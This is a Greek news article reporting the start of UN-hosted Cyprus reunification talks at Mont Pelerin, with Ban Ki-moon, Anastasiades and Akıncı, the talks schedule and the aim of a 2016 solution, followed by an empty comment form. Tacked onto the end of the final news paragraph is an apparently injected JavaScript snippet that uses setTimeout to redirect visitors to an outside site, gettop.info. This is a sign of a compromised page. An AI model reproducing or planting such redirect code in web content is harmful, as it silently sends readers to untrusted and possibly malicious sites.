Ξεκίνησε η σύνοδος για το Κυπριακό στην Ελβετία – Λύση μέσα στο 2016 θέλει ο Μπαν Κι Μουν

0
8

 

Στο ελβετικό θέρετρο Μοντ Πελερίν βρίσκεται ο γγ του ΟΗΕ Μπαν Κι Μουν όπου ξεκινούν οι συνομιλίες για την επίλυση του Κυπριακού. Ο Μπαν Κι Μουν αναμένεται να συμμετάσχει στο γεύμα εργασίας στο οποίο θα παρακαθίσουν οι Νίκος Αναστασιάδης και Μουσταφά Ακιντζί, ενώ αμέσως μετά θα αναχωρήσει για Νέα Υόρκη.

Ο σχεδιασμός των Ηνωμένων Εθνών προβλέπει ολοήμερες συνομιλίες έως τις 11 Νοεμβρίου, αυτό δεν αφορά μόνο στους ηγέτες των δύο κοινοτήτων αλλά και τις διαπραγματευτικές ομάδες τους. Οι κκ. Αναστασιάδης και Ακιντζί μπορούν να διαπραγματεύονται για κάποιο από τα ανοικτά κεφάλαια και την ίδια ώρα τα μέλη των ομάδων τους να συζητούν άλλα κεφάλαια ώστε να προχωράει ταχύτερα η διαδικασία.

Στόχος είναι να διεξάγονται συνομιλίες από τις 9 το πρωί μέχρι τις 10 το βράδυ με διάλειμμα από τις 14:00 ως τις 18:00 που ο Κύπριος Πρόεδρος Νίκος Αναστασιάδης έχει ζητήσει να αναπαύεται.

Ο γγ του ΟΗΕ ευελπιστεί να βρεθεί λύση για το Κυπριακό μέσα στο 2016. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here